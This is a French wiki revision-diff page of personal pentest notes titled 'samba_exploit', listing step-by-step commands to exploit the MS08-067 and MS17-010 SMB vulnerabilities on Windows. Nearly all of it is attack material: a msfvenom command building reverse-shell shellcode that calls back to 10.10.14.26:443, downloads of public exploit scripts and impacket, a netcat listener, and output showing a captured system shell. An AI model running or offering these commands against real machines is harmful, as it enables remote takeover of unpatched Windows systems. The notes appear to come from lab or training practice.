Outils d'utilisateurs

Outils du Site


samba_exploit

Différences

Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

Lien vers cette vue

samba_exploit [2020/09/28 22:03]
M0N5T3R créée
samba_exploit [2020/09/28 22:59] (Version actuelle)
M0N5T3R
Ligne 2: Ligne 2:
  
 **exploit SMB VULN MS08-067** **exploit SMB VULN MS08-067**
 +<code>
 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.26 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.26 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
 wget https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py wget https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
Ligne 11: Ligne 11:
  
 C:\WINDOWS\system32> C:\WINDOWS\system32>
 +</code>
  
- +**exploit SMB VULN MS017-10** 
-**exploit SMB VULN MS1710 MS017-10** +<code>
 git clone https://github.com/SecureAuthCorp/impacket git clone https://github.com/SecureAuthCorp/impacket
 cd impacket/ cd impacket/
Ligne 25: Ligne 25:
 listening on [any] 443 ... listening on [any] 443 ...
 C:\WINDOWS\system32> C:\WINDOWS\system32>
 +</code>
samba_exploit.txt · Dernière modification: 2020/09/28 22:59 par M0N5T3R